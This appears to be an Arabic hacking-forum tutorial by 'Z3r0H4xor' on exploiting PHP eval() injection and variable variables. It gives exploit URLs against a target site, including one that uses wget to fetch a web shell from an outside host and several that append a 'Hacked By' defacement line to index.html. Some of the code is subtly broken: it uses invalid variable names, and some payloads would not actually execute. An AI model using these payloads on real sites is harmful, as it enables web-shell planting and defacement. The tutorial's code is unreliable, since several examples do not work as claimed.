السلام عليكم ورحمة الله وبركاتة سلام يارجالة اخباركم ايه ؟ اليوم بنتكلم عن البحث عن الثغرات في المتغيرات الديناميكية وكلنا نعرف انه لغة بي اتش بي مهمة في الاختراق كثير واكتشاف الثغرات بشكل كبير لنة المخترق يعتمد على ثغره ليخترق موقع معين , ونعرف انه سكربتات معروفة مبرمجة بل بي اتش بي مثل " Wordpress , Mybb, Joomla " استغلال المتغيرات الديناميكة تقدر تقول RCE ( Remote Code Execution التي تسمح بتنفيذ امر معين كود PHP:
Dynamic Evaluation Variables
تمام الان نبدا بـ الـ Eval Injection معروفة بـ RCE لما الهكر يتحكم بل ( String ) وحالة حال eval() مثال كود PHP:
$common-variable = "command";
$x = $_GET['arg'];
eval("\$common-variable = \$x;");
نفس مانشوف مافيه علامة دولار في المتغير , يمكن ان نتخطاه عبر المدخلات الخاصة وفي السطر الثاني التطبيق يسمح اننه ندخل واستخدام الـ $ للحصول على الارسال البيانات التطبيق والخالدم لتنفيذها. ونحن ننظر في السطر الثالث ونشوف eval() وضيفتة يتم استدعاء وهاذا تنفيذ سلاسل 2 المذكورة فوق وهاذا مثال بسيط عن استغلاله كود PHP:
<?php
$cmd=$_GET['cmd'];
eval($cmd);
?>
الاستغلال يحلوين يكون بهاذا الشكل ض1 كود PHP:
http://www.target.com/php-files/input.php?cmd=wget www.mysite.com/shell.php
نعرف انه فيه كثير ناس يحبون لغة البي اتش بي هي لفة بسيطة ولكنها قويه الي تجي معها كثير وضايف , البي اتش بي يدعم المتغيرات وهي المتغيرات او التعيبرات الي تقيم الى اسماء المتغيرات الاخرى < ~ مجرد تفكير في هاذا , ويقول لي ان لايسبب مشاكل هذا التعبيرات ممكن استخدامها لتغير حيوي متغير الى يتم الوصول اليها او تععيين اثناء تنفيذ البرنامج مريحة جدا ولكن فكر مره ثانية وراح يكون التفكير ان هاذا هو غير امنة اذا لم تتم السيطرة على اسم المتغير او مظهره يمكن للمهاجم قراءة او كتابة المتغيرات التعسفي مما تسبب حتى الان تنفيذ التعليمات البرمجية بعيد عن اخر . مثال كود PHP:
$var**** = "myvar";
$$var**** = 10;
echo $myvar;
هاذا بيطلب متغير $myvar وبيطبع الـ String عشرة " 10" كود PHP:
$safevar = "Welcome to my site";
$param1 = "";
$param2 = "";
$param3 = "";
# my own "register globals" for param[1,2,3]
foreach ($_GET as $key => $value) {
$$key = $value;
echo $value;
}
زي مانسشوف الحين الملف يستخدم الطباعة Echo , Print ويطبع عباره " مرحبا بك في موقعي " طبعا المخترق يقدر يستغل الثغره في متغير $safevar لشيء ثاني ولنقول مثلا "echo Hacked By Z3r0 >> /home/var/www/public_html/index.html" وتستغل بهاذي الطريقة كود PHP:
http://www.target.com/php-files/input.php?safevar=echo Hacked By z3r0>> /home/var/www/public_html/index.html
& كود PHP:
$function-**** = "myfunction";
$Arg1 = "hello";
$Arg2 = "welcome to my site";
$$function-****("Arg1", "Arg2");
echo $myfunction;
طريقة الاستغلال كود PHP:
http://www.target.com/php-files/input.php?Arg1=hello&Arg2=echo Hacked By Z3r0 >> /home/var/www/public_html/index.html
انتهينا من الدرس ض1 بس حاب انبهه الي ماعجبة الدرس مايرد ض1 كتبتة لنة الملل سوا فايدة كبيرة خخخخ grt'z : Dr.Aadil, Mr.Hx , alzh3r, PreStiGe511, Nok511 , All Members
Dynamic Evaluation Variables | By Z3r0H4xor